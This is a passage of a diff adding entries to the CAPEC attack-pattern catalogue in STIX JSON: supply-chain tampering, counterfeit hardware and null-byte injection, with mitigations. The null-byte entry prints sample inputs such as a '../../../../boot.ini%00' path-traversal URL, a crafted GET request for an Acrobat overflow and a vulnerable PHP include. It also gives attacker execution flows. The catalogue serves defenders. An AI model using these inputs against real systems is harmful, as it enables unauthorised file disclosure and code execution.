"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11b49e7-b222-4698-9d7e-7b3098fd3c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd6d1e37-7460-48f7-bfff-9cbb383c02d6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate need-to-know information from system configuration information depending on the user.", + "id": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-518-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d472e01d-f213-4ced-9fb6-4461edf5f092", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-519", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/519.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Cause Errors in System Design", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--692efabe-275a-4cc4-bce9-b954a6533546", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--133b4c1d-e9fa-451c-aa3f-f35f367c171d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c488b2c-85cb-4c5b-9009-fa3d351a1e2b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b1d403f-8208-4c4f-a659-3772b9f22687", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).", + "external_references": [ + { + "external_id": "CAPEC-52", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/52.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Null Byte Injection", + "external_id": "28", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Null-Byte-Injection" + }, + { + "description": "Embedding Null Code", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Embedding_Null_Code" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability, iDefense Labs Public Advisory, 2004--08---13, Verisign, Inc.", + "external_id": "REF-445", + "source_name": "reference_from_CAPEC", + "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126" + }, + { + "description": "PHP Input Validation Vulnerabilities, Bugtraq mailing list archive", + "external_id": "REF-446", + "source_name": "reference_from_CAPEC", + "url": "http://msgs.securepoint.com/bugtraq/" + } + ], + "id": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Embedding NULL Bytes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Directory Browsing\n Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an adversary could insert a bogus username such as ../../../../../WINDOWS. If the adversary needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the adversary might apply the postfix NULL character (%00) to determine whether this terminates the string.\n Different forms of NULL to think about include\n PATH%00PATH[0x00]PATH[alternate representation of NULL character]%00\n ", + "\n Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote adversaries to execute arbitrary code.\n The problem specifically exists upon retrieving a link of the following form:\n GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1\n Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \"file not found\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an adversary to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:\n 0x77F83AE5 MOV EAX,[EDI+8]0x77F83AE8 MOV ECX,[EDI+C]...0x77F83AED MOV [ECX],EAX\n The register EDI contains a pointer to a user-supplied string. The adversary therefore has control over both the ECX and EAX registers used in the shown MOV instruction.\n Successful exploitation allows remote adversaries to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.\n An adversary does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.\n Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445].See also: CVE-2004-0629", + "\n Consider the following PHP script:\n $whatever = addslashes($_REQUEST['whatever']);include(\"/path/to/program/\" . $whatever . \"/header.htm\");\n A malicious adversary might open the following URL, disclosing the boot.ini file:\n http://localhost/phpscript.php?whatever=../../../../boot.ini%00\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

    2. Techniques
    Try different encodings for null such as \\0 or %00

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) such that they remove data after the null byte(s) in a way that is beneficial to them.

    2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The program does not properly handle postfix NULL terminators" + ], + "x_capec_skills_required": { + "High": "Execution of arbitrary code", + "Medium": "Directory traversal" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.", + "id": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-52-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--947c7cf0-0535-44ac-b13f-ddb607cc9a9c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "spec_version": "2.1", + "target_ref": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-520", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/520.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Hardware Component Inserted During Product Assembly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "\n A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The adversary constructs a counterfeit card that functions normally except that packets from the adversary's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the adversary to bypass the firewall unrestricted.\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate manufacturer or manufacturer's supplier." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d2ec83e-7f8f-4432-9ab1-78af8ba6a895", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201cded3-e9d5-4558-8d0b-11b70dfbb31a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-521", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/521.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Hardware Design Specifications Are Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \"cores\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--232f172a-e624-4b85-b24e-42010deaa829", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39203ce0-f720-4381-82bc-7ef976ea1f67", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9239bace-f868-43d4-9499-32436d123f29", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73386060-fc29-4295-9736-a0468733e412", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e23fda25-c33c-4a99-a18b-62e8f434859e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--88547ca9-12fc-44e8-95b4-1e01d87849eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "spec_version": "2.1", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-522", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/522.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Hardware Component Replacement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "During shipment the adversary is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the adversary to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target Hardware: The adversary must first identify a system that they wish to target, and a specific hardware component that they can swap out with a malicious replacement.

    2. Techniques
    Look for datasheets containing the system schematics that can help identify possible target hardware.
    Procure a system and inspect it manually, looking for possible hardware component targets. Search for manufacturer IDs on hardware chips or FCC IDs on wireless chips to determine their functionality.

  2. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

    3. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test a Malicious Component Replacement: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

    2. Techniques
    Design a malicious hardware component that will perform the same functionality as the target component, but also contains additional functionality.
    Obtain already designed malicious components that just need to be placed into the system.

Exploit

  1. Substitute Components in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary substitutes the malicious component for the targeted component. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

